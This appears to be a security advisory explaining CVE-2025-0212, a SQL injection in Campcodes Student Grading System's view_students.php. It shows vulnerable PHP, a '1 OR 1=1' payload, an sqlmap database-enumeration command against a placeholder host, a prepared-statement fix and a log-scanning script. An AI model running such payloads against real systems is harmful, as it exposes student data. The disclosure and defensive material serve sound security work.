CVE-2025-0212 - Critical SQL Injection Vulnerability in Campcodes Student Grading System 1. (view_students.php) — Details & Exploit

A major security flaw, classified as CVE-2025-0212, has been identified and confirmed in the Campcodes Student Grading System version 1.. The vulnerability impacts an essential part of the software—the /view_students.php file—via insufficiently sanitized input through the id parameter. This issue makes it possible for an unauthenticated, remote attacker to execute arbitrary SQL queries on the back-end database, potentially giving them access to or control over sensitive student data. We break down how this vulnerability works, provide a code example, and offer references for further reading.

What Is CVE-2025-0212?

CVE-2025-0212 is an SQL Injection vulnerability found in the Campcodes Student Grading System (SGS) 1.. The flaw allows a remote attacker to manipulate the id parameter in the URL to inject SQL code into the database request. This can lead to sensitive data leakage, data modification, or even full system compromise depending on the privileges of the database user.

The problem lies in the way /view_students.php processes URLs like:

http://target-site.com/view_students.php?id=123

If the id argument is not properly sanitized (i.e., filtered for malicious code), an attacker can append SQL statements and trick the web server into running them.

In the vulnerable view_students.php file, code might look like this:

<?php
  // Grabbing the ID directly from the URL
  $id = $_GET['id'];

  // Querying the database without sanitizing the input!
  $query = "SELECT * FROM students WHERE id = $id";
  $result = mysqli_query($connection, $query);

  // Display student info, etc.
?>

Here, the $id parameter from the URL is directly inserted into the SQL query. If an attacker enters 1 OR 1=1, the query becomes:

SELECT * FROM students WHERE id = 1 OR 1=1

This will return all rows instead of the single one intended!

How Can Attackers Exploit This?

Someone can easily exploit this flaw just by using a web browser or tools like curl or sqlmap. Here’s a demonstration.

http://target-site.com/view_students.php?id=1%20OR%201%3D1

Using sqlmap

sqlmap -u "http://target-site.com/view_students.php?id=1" --dbs

This command automatically detects the vulnerability and tries to pull database names.

- Data Modification: SQL injection can let attackers alter, remove, or insert new records.
- Authentication Bypass: Attackers could potentially bypass logins if those rely on similar queries.
- Full Compromise: If the database user has FILE privileges, attackers might upload malicious scripts.

Patch & Prevention

Developers should always validate and sanitize user inputs. Using prepared statements (parameterized queries) is key.

How to Fix:

Replace the vulnerable code with this:

<?php
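  // The ? placeholder keeps user input out of the SQL text
  $stmt = $connection->prepare("SELECT * FROM students WHERE id = ?");
  // "i" binds the value as an integer, so it is never parsed as SQL
  $stmt->bind_param("i", $_GET['id']);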
  $stmt->execute();
  $result = $stmt->get_result();
?>
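
Alongside the fix, access logs can be checked for requests where the id value is anything other than a plain integer. The following is an added example, not code from the original post or from Campcodes; it assumes combined-format access logs, and the function names and sample log entries are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client IP, request target and status from a combined-format log line
# (assumed log format; adjust the pattern for other layouts).
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

def suspicious_id(raw_target):
    """Return the decoded id value if it is not a plain integer, else None."""
    parts = urlsplit(raw_target)
    if not parts.path.endswith("/view_students.php"):
        return None
    # parse_qs percent-decodes values and turns '+' into a space, so
    # 1%20OR%201%3D1 and 1+OR+1=1 both decode to the same string.
    values = parse_qs(parts.query, keep_blank_values=True).get("id", [])
    for value in values:  # a repeated id parameter is checked value by value
        if not re.fullmatch(r"\d{1,10}", value):
            return value
    return None

def scan(lines):
    """Return (client_ip, status, decoded_id) for each flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        value = suspicious_id(target)
        if value is not None:
            hits.append((ip, int(status), value))
    return hits

# Constructed sample entries (documentation-range IPs), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Jan/2025:16:20:01 +0000] "GET /view_students.php?id=123 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/Jan/2025:16:21:44 +0000] "GET /view_students.php?id=1%20OR%201%3D1 HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/Jan/2025:16:21:50 +0000] "GET /view_students.php?id=1+OR+1=1 HTTP/1.1" 200 48211 "-" "curl/8.5.0"',
    '198.51.100.7 - - [04/Jan/2025:16:22:10 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE_LOG):
        print(f"{ip} status={status} id={value!r}")
```

A flagged request that returned status 200 with an unusually large response before the fix was deployed is worth following up as possible data exposure.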

References

- Original Exploit Disclosure (packetstormsecurity.org)
- CVE ID: CVE-2025-0212 on NIST *(search for CVE-2025-0212)*
- Campcodes Student Grading System Homepage

Final Notes

CVE-2025-0212 is a critical vulnerability and should be patched immediately. If you run Campcodes Student Grading System 1., update your code to use parameterized queries. For more information, always monitor the NVD and exploit databases.


Timeline

Published on: 01/04/2025 16:15:23 UTC
Last modified on: 01/10/2025 18:57:05 UTC